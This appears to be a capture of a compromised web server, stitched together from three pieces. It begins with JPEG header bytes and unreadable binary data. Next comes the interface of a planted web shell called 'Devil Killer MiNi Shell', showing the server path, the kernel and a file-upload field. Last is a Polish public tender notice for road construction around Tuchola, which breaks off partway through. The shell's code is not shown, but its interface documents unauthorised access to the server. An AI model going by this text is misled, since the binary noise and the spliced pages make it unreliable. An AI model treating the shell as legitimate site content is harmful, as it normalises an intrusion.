JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240227/0022182201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa, przebudowa dróg na terenie Tucholskiego Związku Powiatowo-Gminnego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Tucholski Związek Powiatowo-Gminny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 525066834</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pocztowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuchola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523344091</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@tzpg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://tzpg.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa, przebudowa dróg na terenie Tucholskiego Związku Powiatowo-Gminnego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb840d32-d56b-11ee-8305-7e4937eb936d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00221822</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00427244/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa, przebudowa dróg na terenie Tucholskiego Związku Powiatowo - Gminnego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sidaspzp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sidaspzp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 3 ust. 3<br/>Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej:<br/>“Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>sidaspzp.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 3 GB Ram, procesor 1500 MHZ lub lepszy, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10.12, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) sidaspzp.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z załącznikiem nr 9 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z załącznikiem nr 9 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Część 1. Budowa drogi wewnętrznej ul. Kasztanowej w Tucholi, realizatorem zadania jest Gmina Tuchola.<br/><br/>1. Przedmiotem niniejszego zamówienia jest budowa ulicy Kasztanowej w Tucholi wraz przebudową istniejącej sieci elektroenergetycznej <br/>2. W zakresie zadania zaprojektowano ciąg pieszo jezdny szerokości 5,0 m o nawierzchni z kostki betonowej. Ciąg ten połączony jest bezpośrednio z drogą wojewódzką (ulica Czarna Droga) poprzez skrzyżowanie które to zostało wyremontowane podczas remontu drogi wojewódzkiej 241. <br/>W ramach niniejszego zadania przewiduje się roboty branży drogowej tj.:<br/>	budowę ulicy pieszo jednej o nawierzchni z kostki betonowej <br/>	budowę zjazdów ,indywidualnych oraz dojść do posesji, <br/>	wykonanie elementów bezpieczeństwa ruchu drogowego, <br/>	wykonanie robót wykończeniowych głownie wykonania humusowania terenu przyległego. <br/>Podstawowe parametry techniczne: <br/>a)	długość drogi wewnętrznej 208,59 m, <br/>b)	prędkość projektowa Vp: 30 km/h,<br/>c)	droga wewnętrzna, <br/>d)	kategoria ruchu: - KR-1, <br/>e)	szerokość jezdni: - 5,0 m <br/>W ramach zadania należy również przebudować sieć elektroenergetyczną o nap. 0,4 kV i 15 kV w ramach zadania: &#34;Budowa ulicy Kasztanowej w Tucholi”.<br/>Projekt obejmuje:<br/>a) demontaż odcinka kabla SN-15 kV o długości trasowej 15 m <br/>b) budowę nowego odcinka kabla SN-15 kV o długości trasowej 15 m <br/>c) demontaż odcinka kabla n.n. 0.4 kV o długości trasowej 40 m<br/>d) budowę nowego odcinka kabla SN-15 kV o długości trasowej 52 m<br/>e) zabezpieczenie istniejących linii kablowych o napięciu 0,4 rurami dwudzielnymi; łączna długość: 24 m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Część 2. Budowa drogi gminnej nr 010778C ul. Obrońców Polskości wraz z kanalizacją deszczową, realizatorem zadania jest Gmina Tuchola.<br/><br/>1. Przedmiotem zamierzenia budowlanego jest budowa ul. Obrońców Polskości (droga gminna nr 010778C) oraz dwóch łączników, stanowiących połączenie ul. Obrońców Polskości z ul. Jana Pawła II w Tucholi, wraz z budową sieci kanalizacji deszczowej. Łączna długość projektowanych odcinków ulic wynosi 318,88 m.<br/>2.A. Przedsięwzięcie swoim zakresem robót branży drogowej obejmuje:<br/>- wykonanie robót ziemnych,<br/>- osłonięcie kabli energetycznych i telekomunikacyjnych rurami dwudzielnymi,<br/>- wykonanie regulacji wysokościowej armatury sieci wodociągowej, telekomunikacyjnej, gazowej oraz kanalizacji sanitarnej,<br/>- ustawienie krawężników betonowych, oporników betonowych i obrzeży betonowych na ławie betonowej z oporem,<br/>- budowę jezdni o nawierzchni z kostki betonowej szarej,<br/>- budowę wyniesionego skrzyżowania o nawierzchni z kostki betonowej czerwonej,<br/>- budowę terenu utwardzonego o nawierzchni z betonowych płyt ażurowych,<br/>- budowę zjazdów zwykłych o nawierzchni z kostki betonowej grafitowej,<br/>- budowę dojść do posesji o nawierzchni z kostki betonowej żółtej,<br/>- wykonanie pobocza o nawierzchni gruntowej,<br/>- wykonanie zieleni niskiej,<br/>- ustawienie znaków tymczasowej i stałej organizacji ruchu.<br/>2.B. Zakres robót branży sanitarnej polega na budowie systemu kanalizacji deszczowej na terenie ulicy Obrońców Polskości w miejscowości Tuchola w Powiecie Tucholskim, gminie Tuchola.<br/>Przewidziane zamierzenie zrealizowane zostać ma na terenie działek o nr ewid. 3258, 3260. jedn. ewid Tuchola. Przewody kolektora głównego zaprojektowano w systemie z rur kielichowych dwuściennych PP/ID o średnicy od 250 mm do 300 mm łączonych za pomocą złączek kielichów z uszczelkami. Zastosowane zostaną rury o sztywności obwodowej SN 8 przeznaczone do stosowania w miejscach o dużych obciążeniach statycznych i dynamicznych. Przykanaliki budowane będą z rur PCV 200 mm, litych SN 8. Na trasie projektowanej sieci kanalizacji deszczowej projektuje się wykonanie studzienek rewizyjnych DN 1200. Studzienki wykonane zostaną z żelbetowych elementów prefabrykowanych z uszczelkami gumowymi i pierścieniami odciążającymi. Wszystkie zwieńczenia to jest włazy i wpusty minimum klasy typu D400. Zastosowano wpusty uliczne z rusztem uchylnym na zawiasie z ryglem zabezpieczającym, o wymiarach 600x400mm. Odbiór wód deszczowych z ulicy Obrońców Polskości odbywać się będzie poprzez istniejący kolektor dn 300 w ulicy Żwirowej. Wody z ulicy Żwirowej trafiaj dalej poprzez istniejący separator do skrzynek rozsączających w ulicy Aleja 700 lecia. Zgodnie z zakresem opracowania z dnia 30.01.2019 pod nazwą: ,,Operat wodno prawny na usługę wodną - odprowadzanie do urządzeń wodnych wód opadowych lub roztopowych, ujętych w otwarte lub zamknięte systemy kanalizacji deszczowej służące do odprowadzania opadów atmosferycznych albo w systemy kanalizacji zbiorczej w granicach administracyjnych miast oraz na wykonanie urządzenia wodnego układu skrzyń rozsączających na działce 3060 obręb Tuchola- Rudzki Most’’ istniejący system skrzynek zakłada odwodnienie ulicy Obrońców Polskości.<br/>W zakresie przebudowy ulicy Obrońców Polskości jest budowa 10 wpustów deszczowych włączonych do kolektora deszczowego poprzez przykanaliki PCV 200 SN 8 długości 32m, kolektor grawitacyjny z rur PP DN/ID 300 długości 117,42 m. SN 8 i PP DN/ID 250 SN 8 długości 57 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231110-9 - Roboty budowlane w zakresie kładzenia rurociągów</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Część 3. Rozbudowa drogi nr 1030C na terenie gminy Lubiewo, realizatorem zadania jest Powiat Tucholski.<br/><br/>1. Przedmiotem zamówienia jest rozbudowa drogi powiatowej nr 1030C relacji Cekcyn – Sokole Kuźnica na odcinku od km 6+500 do km 8+000 . Długość odcinka objętego inwestycją 1,5 km. <br/><br/>2. Zakres robót obejmuje w szczególności <br/>- odtworzenie trasy drogi,<br/>- wycinka zieleni, <br/>- roboty rozbiórkowe, <br/>- wyniesienie zrid-u w teren , z stabilizacja pasa drogowego wraz z ustawieniem słupków zółto-czarnych z napisem pas drogowy <br/>- wykonanie robót ziemnych,<br/>- osłona kabli energetycznych, <br/>- wykonanie podbudowy, <br/>- wykonanie nawierzchni jezdni,<br/>- budowę drogi rowerowej oraz ciągu pieszo rowerowego, <br/>- przebudowa zjazdów <br/>- elementy BRD, <br/>- przebudowa , budowa kanalizacji deszczowej , <br/>- przebudowę sieci telekomunikacyjnej , <br/>- budowa oświetlenia przejść dla pieszych <br/><br/>Materiały z rozbiórki (elementy betonowe, podbudowy z kruszywa oraz betonowe, nawierzchnie bitumiczne) są własnością zamawiającego. Obowiązkiem wykonawcy jest przetworzenie do ponownego użytkowania w trybie przepisów ustawy o odpadach materiałów z rozbiórki poprzez przekruszenie materiału do frakcji 0-63 , przewiezienie pełnowartościowego gruzu wraz z orzeczeniem o jakości kruszywa do Zarządu Dróg Powiatowych w Tucholi – ul. Przemysłowa 6. Utylizacja pozostałych elementów z rozbiórki leży po stronie wykonawcy. <br/><br/>Zapewnienia i pokrycia kosztów obsługi geodezyjnej, w tym wykonanie inwentaryzacji geodezyjnej w 2 egz. wraz z wyniesieniem Zrid-u w teren.<br/>Wykonawca dostarczy:<br/>- deklaracja (oświadczenie) o właściwym zagospodarowaniu odpadów,<br/>- oświadczenie geodety o sporządzeniu inwentaryzacji oraz potwierdzenie złożenia w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej Starostwa Powiatowego w Tucholi. W ciągu 30 dniu od terminu odbioru końcowego wykonawca dostarczy inwentaryzację geodezyjna z pozytywną weryfikacją </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111230-9 - Roboty w zakresie stabilizacji gruntu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">32412100-5 - Sieć telekomunikacyjna</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Część 4. Przebudowa dróg powiatowych nr 1007C (ok 750 mb) i 1016C (ok 750 mb) na terenie gminy Śliwice, realizatorem zadania jest Powiat Tucholski.<br/><br/>I. Przedmiotem zamówienia jest modernizacja drogi powiatowej 1016C Okoniny Nadjeziorne Lińsk w zakresie: Modernizacja drogi powiatowej nr 1016C na odcinku od km 1+621 do km 2+954 długości 1333 m <br/>1. Zakres robót obejmuje w szczególności:<br/>- Odtworzenie trasy drogi,<br/>- Wykonanie wzmocnienia nawierzchni jezdni z mieszanki mineralno asfaltowej, <br/>- Wykonanie poboczy z kruszyw łamanego,<br/>- Likwidacja przełomów, <br/>- Budowa zjazdów istniejących <br/>- Ustawienie ścieków z elementów betonowych, <br/>- Wykonanie elementów BRD.<br/><br/>3. Wszystkie roboty budowlane objęte 